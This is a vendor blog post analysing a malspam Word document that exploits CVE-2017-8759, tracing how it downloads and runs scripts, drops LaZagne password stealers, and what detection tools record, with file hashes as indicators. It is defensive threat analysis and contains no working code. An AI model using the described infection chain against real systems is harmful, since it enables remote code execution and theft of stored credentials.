Ahmed Sonbol

Malspam and CVE-2017-8759

Blog Post created by Ahmed Sonbol Employee on Sep 18, 2017

On September 12th FireEye security researchers disclosed information about CVE-2017-8759, a SOAP WSDL parser code injection vulnerability [1]. Microsoft already released patch to address the vulnerability in affected products [2]. It didn't take a lot of time to start seeing a significant increase in the number of malicious files trying to exploit the vulnerability. A day or two after the disclosure there was a handful of samples submitted to VirusTotal. A week later more than a hundred samples were submitted. It indicates that exploiting the vulnerability is shifting from targeted attacks to mass distribution.

 

In this blog post we will discuss the host and network behavior of one of those samples and see how the activities look in RSA NetWitness Packets and NetWitness Endpoint.

 

The delivery document under investigation is spreading as Quote.doc. Upon opening the RTF in Microsoft Word, an HTTP request was noticed:

 

 

For this session, NetWitness Packets registered the following meta under Service Analysis suggesting suspicious network traffic:

 

  

The WSDL parser handles the SOAP response. The following events took place on the infected host:

  • A .cs source code file (Logo.cs in this case) was generated in C:\Windows\System32\com\SOAPAssembly
  • csc.exe compiled the generated source code into a DLL file (http100googlegtv4com0pppp0office4png.dll in this case).
  • Microsoft Word loaded the generated DLL file,
  • An HTTP request was sent (to the same server) to retrieve a script.
  • mshta.exe was called to run the downloaded script.

 

The next screenshot shows the machine scandata on NetWitness Endpoint:

 

 

Here is an event reconstruction of the second payload delivery:

 

 

 

The screenshot below shows the files created in C:\Windows\System32\com\SOAPAssembly

 

 

Here is a better look at the content of the newly created source code file Logo.cs:

 

 

When the second payload ran, it issued an HTTP request to a direct IP address in order to download an obfuscated powershell script:

 

 

 

When powershell.exe ran, it dropped an executable on the victim machine: 

 

 

The dropped executable is a LaZagne variant. LaZagne is a publicly available open source application to retrieve passwords stored on a local computer. VirusTotal analysis results can be found here. Here is the report from hybrid-analysis.com. On NetWitness Endpoint the following module IIOC were generated:

  • In root of AppDataRoaming directory
  • Unsigned writes executable
  • Unsigned writes executable to users directory
  • Unsigned writes executable to AppDataLocal directory
  • Self delete
  • In AppData directory

 

 

Following the execution of LaZagne.exe, you can notice a newly created process AZAaPaAA.exe which is also a LaZagne variant according to VirusTotal analysis results. Analysis report from hybrid-analysis.com is available here. NetWitness Endpoint generated even more IIOC for this module:

  • In root of Program directory
  • In root of AppDataRoaming directory
  • In hidden directory
  • Unsigned opens OS process
  • Unsigned writes executable
  • Unsigned writes executable to Windows directory
  • Unsigned writes executable to users directory
  • Unsigned writes executable to AppDataLocal directory
  • Self delete
  • Unsigned copy itself
  • Runs powershell with long arguments
  • In AppData directory
  • In ProgramData directory
  • Unsigned opens process
  • Runs command shell
  • Runs powershell

 
A quick look at the embedded strings of those binaries confirm what kind of data they are targeting:

 

 

 

Finally, below is a recap of the HTTP traffic in NetWitness Packets:

 

 

Delivery document (SHA256):

  • 640b9b789efe66bca20812af4f4e017bb7524ee8a6a4ec5e153a73af9bd0a007

 

LaZagne binaries (SHA256):

  • 3f6e8dea07b6e87182b3068868746e5054123a7c86e04d775292af7ffd1ce9b4
  • 9485a1630d9283d7efee3828fca32d72cfcb3fb1e91015a9753df09a21f14da2

 

References:

  1. FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY « Threat Research Blog | FireEye Inc 
  2. https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759  

Outcomes